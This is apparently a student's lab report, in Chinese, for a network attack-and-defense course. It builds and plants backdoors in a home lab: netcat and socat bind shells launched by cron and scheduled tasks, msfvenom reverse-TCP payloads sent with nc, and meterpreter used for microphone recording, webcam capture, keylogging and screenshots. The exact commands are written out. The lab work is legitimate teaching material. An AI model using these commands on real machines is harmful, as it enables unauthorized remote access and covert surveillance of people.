其他分享
首页 > 其他分享> > 20192418 2021-2022-2 《网络与系统攻防技术》实验二实验报告

20192418 2021-2022-2 《网络与系统攻防技术》实验二实验报告

作者:互联网

1.实验内容

(1)使用netcat获取主机操作Shell,cron启动某项任务(任务自定)

PS:cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

2.实验过程

一、使用netcat获取主机操作Shell,cron启动

  1. 查看kali和主机的ip地址:
  1. Win10主机使用ncat程序监听本机的1221端口(端口可以随机,这里随便输入为1221)

  1. kali虚拟机netcat连接Win10主机,反弹shell后,成功getshell

  1. cron启动

时间到了,getshell:

二、使用socat获取主机操作Shell, 任务计划启动

  1. 在任务计划程序中创建任务

进入管理界面之后点击创建任务

选择触发器——>新建,并将触发器配置成下图所示:

再点击操作——>新建,在程序或脚本里面找到socat路径,在参数里面填写 tcp-listen:1221 exec:cmd.exe,pty,stderr。 把cmd.exe绑定到端口1221,同时把cmd的stderr重定向到stdout上。

按Win+L锁定主机,再解锁之后,可以发现之前创建的任务已经开始运行了:

  1. 通过kali连接Win10主机

输入 socat - tcp:192.168.211.1:1221 指令连接Win10主机,getshell

三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  1. 使用 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.72.128 LPORT=1221 -f exe > 20192418.exe指令生成后门。

  1. 在Win10中使用ncat -lv 1221 > 20192418.exe指令将被控制主机进入接受文件模式

  1. 在kali中使用nc 192.168.72.1 1221 < 20192418.exe将后门传输过去

  1. 在kali上使用msfconsole指令进入msf控制台

  1. 输入指令进行连接

  1. Win10主机运行后门“20192418.exe”

  1. kali上getshell

四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  1. 使用record_mic指令可以截获一段录音音频:

  1. 使用webcam_snap指令可以调用摄像头进行拍照,效果如下:

  1. 使用 keyscan_start 指令记录键盘输入,使用 keyscan_dump 指令读取击键记录

  1. 使用 screenshot 指令可以进行截屏

五、可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

获得主机shell:msfvenom -p linux/x86/reverse_tcp LHOST=192.168.72.128 LPORT=2418 -x ./pwn20192418 -f elf >20192418pwnshellcode

生成完payload之后,运行MSF(具体指令参考上一过程),再运行生成的20192418pwnshellcode文件,就可以getshell了

3.问题及解决方案

4.学习感悟、思考等

基础问题回答:

  1. 例举你能想到的一个后门进入到你系统中的可能方式?
    在非正规网站下载盗版软件,后门与盗版软件一并被下载。
  2. 例举你知道的后门如何启动起来(win及linux)的方式?
    后台插入免杀进程,替换或感染系统文件。
  3. Meterpreter有哪些给你印象深刻的功能?
    获取密码,下载注册表,获取系统信息等功能。
  4. 如何发现自己有系统有没有被安装后门?

感悟:

在本次实验中,我学习到了后门的原理,学会了怎样去制作后门和使用后门,还有MSF的使用。这次实验的难度不大,但是在实验过程中出现了很多各种各样的小问题,但是都能自己逐个解决,通过实验提高了自己的动手能力,本次实验让我受益匪浅。

参考资料

标签:后门,Shell,20192418,1221,主机,指令,2021,2022,使用
来源: https://www.cnblogs.com/zhangxi2418/p/16089560.html